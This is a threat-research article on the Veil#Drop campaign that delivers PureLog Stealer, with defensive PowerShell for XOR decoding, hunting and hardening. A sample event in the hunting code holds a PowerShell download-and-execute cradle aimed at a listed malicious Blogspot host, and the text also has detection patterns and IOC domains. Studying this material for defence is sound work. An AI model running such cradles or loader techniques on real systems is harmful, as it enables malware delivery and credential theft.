Hackers Abuse Blogspot and PowerShell Download Cradles to Deploy PureLog Stealer
Security researchers have uncovered a malware delivery campaign called Veil#Drop that abuses Blogspot pages, PowerShell download cradles, and fileless .NET execution to deploy PureLog Stealer on Windows systems.
The campaign starts with a deceptive JavaScript file named transcript.pdf.js. Because Windows often hides known file extensions, the file may appear to victims as a normal PDF document.
Securonix Threat Research said the infection chain uses compromised websites, malicious JavaScript launchers, Blogspot-hosted payloads, XOR obfuscation, reflective .NET loading, and trusted Microsoft utilities to reduce detection.
How the Veil#Drop Attack Starts
The first stage relies on social engineering. A victim downloads and opens transcript.pdf.js, believing it to be a document rather than a script.
Once executed, the file runs through Windows Script Host and launches PowerShell with execution policy bypasses enabled. PowerShell then fetches the next stage from attacker-controlled Blogspot pages.
The Hacker News reported that Securonix researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee traced the chain from the disguised JavaScript file to in-memory PureLog Stealer execution.
| Stage | Component | Purpose |
|---|---|---|
| Initial file | transcript.pdf.js | Disguises a JavaScript launcher as a document. |
| Execution | Windows Script Host and PowerShell | Runs commands and retrieves the next payload. |
| Staging | Blogspot-hosted files | Uses trusted web infrastructure to deliver malware stages. |
| Loading | XOR decoding and .NET reflection | Executes payloads in memory without writing a normal executable. |
| Final malware | PureLog Stealer | Steals browser data, credentials, cookies, and cryptocurrency wallet data. |
Why Blogspot Helps the Attack Blend In
Blogspot is a Google-owned blogging platform, so traffic to Blogspot domains may look less suspicious than traffic to newly registered malware domains.

Attackers used Blogspot pages to stage files such as phud.dudus.docx.pdf.olp.sys and niple.docx.odp.pdf.sys. These names also use multiple extensions to make analysis harder at a glance.
HivePro described Veil#Drop as a multi-stage, largely fileless delivery framework that uses Blogspot pages to stage XOR-obfuscated PowerShell loaders before deploying PureLog Stealer.
PowerShell Download Cradles Keep the Chain Fileless
PowerShell download cradles let attackers retrieve and execute code from the web without saving a standard executable to disk. That can reduce the number of files available for antivirus scanning.
In this campaign, PowerShell pulls code from Blogspot and runs it in memory. Later stages decode payloads only at runtime, which creates fewer traditional forensic artifacts.
Microsoft's own documentation describes PowerShell execution policies as a safety feature that helps prevent unintentional script execution, not as a security boundary, which is why a single `-ExecutionPolicy Bypass` flag is enough for the launcher to get past them.
How the Payload Is Hidden
The second-stage loader deletes the original JavaScript launcher and performs additional actions to prepare the system for later execution.
Securonix found that the malware decrypts hidden payload data using a repeating XOR routine. It then builds a new Blogspot URL dynamically, with random characters added so each infection can look slightly different.
Cyber Security News reported that the third-stage file contains two large blocks of encoded numeric data that decode into .NET programs loaded directly into memory.
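An analyst helper for the decoding step described above, added here as an example rather than code from Securonix, Cyber Security News, or the malware itself. It assumes the encoded stage is carried as a comma-separated list of decimal byte values XORed with a short repeating key, which illustrates the general technique and is not a claim about the exact routine or key in Veil#Drop. The sample block is constructed by XOR-encoding a fake minimal PE header, and the candidate keys are hypothetical.

```powershell
# Added triage example (not from the cited sources): recover and sanity-check a
# .NET stage hidden as XOR-obfuscated numeric data. The key, the numeric format and
# the sample block are assumptions for illustration, not the campaign's real values.

function ConvertFrom-RepeatingXor {
    param(
        [Parameter(Mandatory)][byte[]]$Data,
        [Parameter(Mandatory)][byte[]]$Key
    )
    $out = [byte[]]::new($Data.Length)
    for ($i = 0; $i -lt $Data.Length; $i++) {
        # The key byte repeats every $Key.Length positions.
        $out[$i] = $Data[$i] -bxor $Key[$i % $Key.Length]
    }
    return ,$out
}

function Test-PeImage {
    # $true when the bytes start with an MZ header whose e_lfanew points at a PE signature.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    if ($Bytes.Length -lt 0x40) { return $false }
    if ($Bytes[0] -ne 0x4D -or $Bytes[1] -ne 0x5A) { return $false }      # 'MZ'
    $peOffset = [BitConverter]::ToInt32($Bytes, 0x3C)                   # e_lfanew
    if ($peOffset -lt 0x40 -or $peOffset + 4 -gt $Bytes.Length) { return $false }
    return ($Bytes[$peOffset] -eq 0x50 -and $Bytes[$peOffset + 1] -eq 0x45 -and
            $Bytes[$peOffset + 2] -eq 0 -and $Bytes[$peOffset + 3] -eq 0)  # 'PE\0\0'
}

function Find-XorKey {
    # Try each candidate key; the right one turns the numeric block into a PE image.
    param([byte[]]$Data, [object[]]$Candidates)
    foreach ($k in $Candidates) {
        $dec = ConvertFrom-RepeatingXor -Data $Data -Key ([byte[]]$k)
        if (Test-PeImage $dec) { return [pscustomobject]@{ Key = [byte[]]$k; Bytes = $dec } }
    }
    return $null
}

# Constructed sample: a 0x44-byte fake PE header, XORed with a hypothetical 4-byte key.
$fake = [byte[]]::new(0x44)
$fake[0] = 0x4D; $fake[1] = 0x5A                                   # MZ
[BitConverter]::GetBytes([int32]0x40).CopyTo($fake, 0x3C)         # e_lfanew = 0x40
$fake[0x40] = 0x50; $fake[0x41] = 0x45                             # PE\0\0
$trueKey = [byte[]](0x5A, 0x13, 0x7F, 0x21)
$encoded = (ConvertFrom-RepeatingXor -Data $fake -Key $trueKey) -join ','   # numeric block as a loader would carry it

# Analyst side: parse the numeric block back to bytes and try candidate keys.
$data = [byte[]]($encoded -split ',' | ForEach-Object { [byte]$_ })
$candidates = @([byte[]](0xFF), [byte[]](0x5A, 0x13, 0x7F, 0x21))
$result = Find-XorKey -Data $data -Candidates $candidates
if ($result) {
    $keyHex = ($result.Key | ForEach-Object { '{0:X2}' -f $_ }) -join ' '
    "Decoded with key {0}: valid PE header, {1} bytes" -f $keyHex, $result.Bytes.Length
    # For a real stage, write $result.Bytes to disk for sandboxed analysis rather than
    # handing them to [Reflection.Assembly]::Load(), which is the loader's own pattern.
} else {
    'No candidate key produced a PE image'
}
```

The MZ/PE check is what makes key recovery cheap: a wrong key scrambles the first two bytes, so even a brute force over all single-byte keys or a short list of keys pulled from the loader's script block log finishes instantly. The same check also tells an analyst that a decoded block is a managed executable worth pulling apart, rather than more obfuscated script.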
Trusted Microsoft Tools Serve as Fallbacks
Veil#Drop also abuses legitimate Microsoft-signed utilities, often called LOLBINs, as fallback execution paths. These tools exist on many Windows systems and can appear normal in enterprise environments.
Securonix listed RegSvcs, InstallUtil, MSBuild, CSC, VBC, ILASM, and AspNet_Compiler among the tools observed in the chain.

The Securonix analysis said this fallback architecture helps the malware continue execution when the primary in-memory loading method fails.
What PureLog Stealer Tries to Collect
PureLog Stealer is an information-stealing malware family. Once active, it searches for valuable user and system data that attackers can sell, reuse, or exploit for account takeover.
The final payload can collect browser credentials, cookies, session data, autofill information, browsing history, cryptocurrency wallet data, and host details from infected Windows systems.
HivePro's advisory says the malware targets browsers including Chrome, Edge, Firefox, Brave, and Opera, as well as wallets such as MetaMask, Exodus, Atomic Wallet, Electrum, Trust Wallet, Coinbase Wallet, and Binance Wallet.
Why Traditional Antivirus May Miss This Campaign
The campaign's strength comes from combining ordinary-looking parts. JavaScript, PowerShell, Blogspot traffic, and Microsoft utilities are not automatically malicious on their own.
The suspicious behavior becomes clearer when defenders connect the full chain: a document-themed JavaScript file launches PowerShell, PowerShell contacts Blogspot, the loader decodes .NET payloads, and trusted utilities appear as fallback execution paths.

The Hacker News noted that the framework was built to reduce forensic artifacts and maintain stealth throughout the infection lifecycle.
Indicators Mentioned in the Campaign
Organizations should use indicators of compromise as starting points, not as the only detection method. The campaign also changes URLs dynamically, which makes behavior-based hunting important.
| Type | Indicator | Description |
|---|---|---|
| Filename | transcript.pdf.js | Initial JavaScript launcher disguised as a PDF document. |
| Filename | phud.dudus.docx.pdf.olp.sys | Second-stage PowerShell loader retrieved from Blogspot. |
| Filename | niple.docx.odp.pdf.sys | Third-stage loader containing encoded PureLog Stealer assemblies. |
| Domain | htlwub00klocate[.]blogspot[.]com | Blogspot domain used to stage the second-stage payload. |
| Domain | cpyzaramay26[.]blogspot[.]com | Blogspot domain used to stage the third-stage payload. |
What Defenders Should Monitor
Security teams should focus on process chains and script behavior rather than only checking file hashes. A single event may look harmless, but the full sequence can reveal the attack.
- wscript.exe or cscript.exe executing .js files, especially ones with a document extension in front of the script extension.
- Windows Script Host spawning PowerShell.
- PowerShell running with execution policy bypass flags.
- PowerShell making outbound connections to Blogspot.
- Use of Reflection.Assembly::Load or similar .NET in-memory loading patterns.
- PowerShell spawning InstallUtil, MSBuild, RegSvcs, CSC, VBC, ILASM, or AspNet_Compiler.
- Downloads with multiple misleading extensions such as .pdf.js or .docx.pdf.sys.
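A hunting function that applies the checks in the list above to process-creation and network events, added here as an example and not code from Securonix or the other sources cited. It runs offline against constructed objects shaped like Sysmon Event ID 1 (process create) and Event ID 3 (network connect) fields; on a real endpoint the same function would be fed by Get-WinEvent against the Sysmon operational log. The process IDs, paths, and command lines in the sample are constructed to mirror the chain described in the article, and the Blogspot hostname reuses one of the indicators listed above.

```powershell
# Added hunting example: score process chains against the Veil#Drop behaviours
# listed above. Not Securonix code. Input objects mimic Sysmon Event ID 1/3 fields;
# the sample events below are constructed and the PIDs are hypothetical.

$LolBins = 'regsvcs.exe', 'installutil.exe', 'msbuild.exe', 'csc.exe', 'vbc.exe',
           'ilasm.exe', 'aspnet_compiler.exe'

function Find-VeilDropChains {
    param([Parameter(Mandatory)][object[]]$Events)

    $procs = $Events | Where-Object EventId -eq 1
    $nets  = $Events | Where-Object EventId -eq 3
    $hits  = @()

    foreach ($p in $procs) {
        $image   = [IO.Path]::GetFileName($p.Image).ToLower()
        $parent  = [IO.Path]::GetFileName($p.ParentImage).ToLower()
        $reasons = @()

        # Windows Script Host running a script whose name hides the script extension
        if (($image -in 'wscript.exe', 'cscript.exe') -and
            ($p.CommandLine -match '\.(pdf|docx?|xlsx?|txt)\.(js|jse|vbs|wsf)\b')) {
            $reasons += 'WSH running a double-extension script'
        }
        # WSH spawning PowerShell, optionally with bypass, cradle and reflection markers
        if (($image -in 'powershell.exe', 'pwsh.exe') -and ($parent -in 'wscript.exe', 'cscript.exe')) {
            $reasons += 'WSH spawned PowerShell'
            if ($p.CommandLine -match '-(ep|ex|exec|executionpolicy)\s+bypass') { $reasons += 'execution policy bypass' }
            if ($p.CommandLine -match '(DownloadString|DownloadData|Invoke-WebRequest|iwr|Invoke-RestMethod|irm)\b') { $reasons += 'download cradle' }
            if ($p.CommandLine -match 'Reflection\.Assembly\]?::Load') { $reasons += 'reflective .NET load' }
        }
        # PowerShell falling back to a signed Microsoft build or installer utility
        if (($image -in $LolBins) -and ($parent -in 'powershell.exe', 'pwsh.exe')) {
            $reasons += "PowerShell spawned LOLBIN $image"
        }
        # PowerShell with a Blogspot connection in the network events for the same PID
        if ($image -in 'powershell.exe', 'pwsh.exe') {
            $blog = $nets | Where-Object { $_.ProcessId -eq $p.ProcessId -and $_.DestinationHostname -like '*.blogspot.com' }
            if ($blog) { $reasons += "PowerShell connected to $(@($blog)[0].DestinationHostname)" }
        }

        if ($reasons.Count -gt 0) {
            $hits += [pscustomobject]@{ ProcessId = $p.ProcessId; Image = $image; Parent = $parent; Reasons = $reasons -join '; ' }
        }
    }
    return $hits
}

# Constructed sample events (hypothetical PIDs; hostname taken from the IOC table above).
$sample = @(
    [pscustomobject]@{ EventId = 1; ProcessId = 4100; Image = 'C:\Windows\System32\wscript.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = '"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\transcript.pdf.js"' }
    [pscustomobject]@{ EventId = 1; ProcessId = 4120; Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'; ParentImage = 'C:\Windows\System32\wscript.exe'
                       CommandLine = 'powershell.exe -ep bypass -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(''https://htlwub00klocate.blogspot.com/p/x.html'')"' }
    [pscustomobject]@{ EventId = 3; ProcessId = 4120; DestinationHostname = 'htlwub00klocate.blogspot.com'; DestinationPort = 443 }
    [pscustomobject]@{ EventId = 1; ProcessId = 4133; Image = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe'; ParentImage = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                       CommandLine = 'InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\user\AppData\Local\Temp\a.dll' }
    [pscustomobject]@{ EventId = 1; ProcessId = 5000; Image = 'C:\Windows\System32\notepad.exe'; ParentImage = 'C:\Windows\explorer.exe'; CommandLine = 'notepad.exe' }
)

Find-VeilDropChains -Events $sample | Format-Table -AutoSize
```

Each reason on its own is weak evidence, which is the point the article makes: the value is in seeing several of them on one process tree. The notepad event in the sample produces no hit, while the wscript, powershell, and InstallUtil events each come back with one or more reasons and share a parent-child relationship that a SIEM correlation rule can key on.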
Recommended Mitigations
Organizations should limit script execution where it is not needed and collect richer PowerShell telemetry across endpoints.
Microsoft's execution policy documentation also makes clear that execution policy settings should not replace proper application control, endpoint detection, logging, and least-privilege controls.
Cyber Security News highlighted defenses such as restricting Windows Script Host use, monitoring PowerShell bypass attempts, and watching trusted cloud platforms for unusual traffic patterns.
Practical Steps for Security Teams
Security teams should combine endpoint monitoring, network inspection, and user training. The initial file name is simple, but the chain becomes harder to detect after PowerShell takes over.
- Show file extensions by default on managed Windows systems.
- Block or restrict Windows Script Host where business use is limited.
- Enable PowerShell Script Block Logging and Module Logging.
- Alert on PowerShell download cradle behavior and encoded commands.
- Use application control to restrict risky LOLBIN execution paths.
- Inspect unusual Blogspot traffic from endpoints and servers.
- Train users to avoid unexpected files with double or misleading extensions.
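The registry-level version of the first four steps above, added as an example rather than guidance quoted from the sources. The policy paths are the documented locations for Windows PowerShell 5.x, Explorer, and Windows Script Host; they are normally pushed through Group Policy, and the script assumes it is run elevated on a pilot machine where disabling WSH has been confirmed safe.

```powershell
# Added example (not from the cited sources): apply the hardening steps above
# with the registry provider. These are the Windows PowerShell 5.x policy paths;
# PowerShell 7 reads its own PowerShellCore policy key. Run elevated; pilot first.

function Set-VeilDropHardening {
    $explorer = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
    $wsh      = 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings'
    $sbl      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $ml       = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'

    foreach ($key in $wsh, $sbl, "$ml\ModuleNames") {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    }

    # 1. Show file extensions so transcript.pdf.js is not displayed as "transcript.pdf".
    #    Per-user setting; Explorer picks it up after a restart of explorer.exe.
    Set-ItemProperty -Path $explorer -Name HideFileExt -Value 0 -Type DWord

    # 2. Disable Windows Script Host machine-wide where .js/.vbs files have no business use,
    #    so wscript.exe and cscript.exe refuse to run the launcher at all.
    Set-ItemProperty -Path $wsh -Name Enabled -Value 0 -Type DWord

    # 3. Script Block Logging: the decoded text of every script block, including
    #    XOR-decoded later stages, is written to Event ID 4104 in
    #    Microsoft-Windows-PowerShell/Operational.
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # 4. Module Logging for all modules ('*'): cmdlet invocations such as
    #    Invoke-WebRequest or New-Object Net.WebClient are recorded as Event ID 4103.
    Set-ItemProperty -Path $ml -Name EnableModuleLogging -Value 1 -Type DWord
    New-ItemProperty -Path "$ml\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force | Out-Null
}

function Test-VeilDropHardening {
    # Read the same values back so the state can be verified across a fleet.
    $get = { param($Path, $Name) (Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue).$Name }
    [pscustomobject]@{
        ExtensionsShown    = (& $get 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced' 'HideFileExt') -eq 0
        WshDisabled        = (& $get 'HKLM:\SOFTWARE\Microsoft\Windows Script Host\Settings' 'Enabled') -eq 0
        ScriptBlockLogging = (& $get 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging      = (& $get 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging' 'EnableModuleLogging') -eq 1
    }
}

Set-VeilDropHardening
Test-VeilDropHardening
```

Script Block Logging is the setting that matters most for this campaign: because the loader decodes each stage and then executes it as PowerShell, the cleartext of the decoded stage ends up in Event ID 4104 regardless of how it was obfuscated on the wire. Disabling WSH is the one change with real business impact, so it belongs behind a pilot group and an exception process rather than a blanket push.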
The Bigger Lesson From Veil#Drop
Veil#Drop shows how attackers combine trusted platforms, native Windows utilities, and fileless execution to make malware delivery look ordinary.
For defenders, the answer is not only blocking one domain or one filename. Teams need visibility into process relationships, PowerShell behavior, memory loading, and unusual traffic to trusted platforms.
As attackers continue to abuse legitimate infrastructure, organizations must treat trusted domains and signed utilities as possible parts of an attack chain when their behavior does not match normal business activity.
FAQ
Veil#Drop is a multi-stage malware delivery framework analyzed by Securonix. It uses compromised websites, disguised JavaScript files, PowerShell download cradles, Blogspot-hosted payloads, XOR obfuscation, and in-memory .NET execution to deploy PureLog Stealer.
PureLog Stealer is an information-stealing malware family that can harvest browser passwords, cookies, session data, autofill details, browsing history, cryptocurrency wallet data, and system information from infected Windows hosts.
The campaign starts when a victim opens a deceptive JavaScript file such as transcript.pdf.js. The file can appear like a PDF when Windows hides extensions, but it runs through Windows Script Host and launches PowerShell.
PowerShell download cradles let attackers fetch and run code from the web without dropping a normal executable to disk. This helps the malware reduce forensic artifacts and evade file-based security tools.
Organizations should monitor JavaScript launching PowerShell, PowerShell execution policy bypasses, outbound Blogspot traffic, reflective .NET loading, and PowerShell spawning Microsoft utilities such as InstallUtil, MSBuild, RegSvcs, CSC, VBC, ILASM, or AspNet_Compiler.